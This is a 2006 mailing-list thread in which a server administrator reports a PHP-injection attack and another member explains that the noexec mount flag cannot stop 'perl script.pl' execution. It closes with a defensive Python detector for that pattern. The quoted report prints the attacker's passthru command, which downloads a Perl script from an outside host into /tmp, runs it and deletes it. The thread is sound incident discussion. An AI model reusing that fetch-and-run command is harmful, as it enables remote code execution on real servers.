I suppose that the call to perl to run the v6.txt script is being done as
the user "nobody" since it was trying to execute out of a PHP script.
Wonderful.
> -----Original Message-----
> From: Kevin Bonner [mailto:keb (at mark) pa.net]
> Sent: Tuesday, September 12, 2006 3:15 PM
> To: coba-e (at mark) bluequartz.org
> Subject: [coba-e:06866] Re: /TMP Directory
>
> On Saturday 09 September 2006 16:44, Darrell D. Mobley wrote:
> > passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl
> > v6.txt;rm -f v6*');
> > [::snip::]
> > The v6.txt is a Perl script that installs some IRC software and monitors
> > IRC on open ports. I do not think the script was successful in running,
> > but I just want to make sure the /TMP security is enabled where files
> > can't be run there. While I don't think the DDOS attack was successful in
> > running the script, it was successful in shutting down the server due to
> > MySQL becoming overwhelmed. Server load was up to 156!
> >
> > Any suggestions would be appreciated.
>
> Having /tmp flags of noexec,nosuid helps against the clueless script
> kiddies, but in your case it wouldn't prevent the code in v6.txt from
> being executed.
>
> One example:
> [root tmp]# mount | grep /tmp
> /home/dev/tmpMnt on /home/tmp type ext2 (rw,noexec,nosuid,loop=/dev/loop0)
> [root tmp]# pwd
> /home/tmp
> [root tmp]# ls -l hi.pl
> -rw-r--r-- 1 root root 40 Sep 12 15:02 hi.pl
> [root tmp]# cat hi.pl
> #!/usr/bin/perl
> print "Hello World!\n";
> [root tmp]# perl hi.pl
> Hello World!
> [root tmp]#
>
> My /tmp has noexec and yet I'm still able to execute the perl script.
> This is because the perl program is being executed (from /usr/bin/perl)
> and it's interpreting the commands in the hi.pl file. If I were to make
> hi.pl executable and try to execute that file directly, it would be denied.
>
> [root tmp]# chmod 755 hi.pl
> [root tmp]# ls -l hi.pl
> -rwxr-xr-x 1 root root 40 Sep 12 15:02 hi.pl
> [root tmp]# ./hi.pl
> sh: ./hi.pl: Permission denied
> [root tmp]#
>
> Hopefully this helps you understand a little more about the capabilities
> and limitations of the noexec flag on a mounted partition.
>
> Kevin Bonner
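Because `perl hi.pl` sidesteps noexec exactly as Kevin shows, the interpreter-plus-script-on-a-noexec-mount pattern is worth flagging on the defensive side. The following Python is an added example, not code from this thread: it parses a constructed /proc/mounts-style table (modelled on the loop mount above) and, given an execve argv and working directory, reports when an interpreter is handed a script that lives on a noexec filesystem. The interpreter list and the "script is the last argument" rule are assumptions.

```python
"""Flag interpreter-based execution of scripts stored on noexec mounts.

Added example (not from the mailing-list thread). Direct execution
(./hi.pl) is left to the kernel, which already denies it on noexec;
this catches the `perl hi.pl` case that the noexec flag does not stop.
"""
import posixpath

# Interpreters that read and run a file handed to them as an argument.
# Assumption: extend this set to match what is installed on the host.
INTERPRETERS = {"perl", "python", "python3", "sh", "bash", "ruby", "php"}

# Constructed mount table, modelled on the loop mount shown in the thread.
MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
/home/dev/tmpMnt /home/tmp ext2 rw,noexec,nosuid,loop=/dev/loop0 0 0
tmpfs /tmp tmpfs rw,noexec,nosuid 0 0
"""


def parse_mounts(text):
    """Return {mount_point: set(options)} from /proc/mounts-style lines."""
    table = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4:
            table[fields[1]] = set(fields[3].split(","))
    return table


def mount_for(path, table):
    """Longest mount point that is a prefix of the absolute path."""
    best = ""
    for mp in table:
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if len(mp) > len(best):
                best = mp
    return best or "/"


def flag_interpreter_exec(argv, cwd, mounts_text=MOUNTS):
    """True when argv runs an interpreter on a script held on a noexec mount."""
    if len(argv) < 2 or posixpath.basename(argv[0]) not in INTERPRETERS:
        return False
    table = parse_mounts(mounts_text)
    # Assumption: the script path is the last argument; resolve it against cwd
    # so `cd /tmp; perl v6.txt` maps to /tmp/v6.txt.
    script = posixpath.normpath(posixpath.join(cwd, argv[-1]))
    return "noexec" in table.get(mount_for(script, table), set())
```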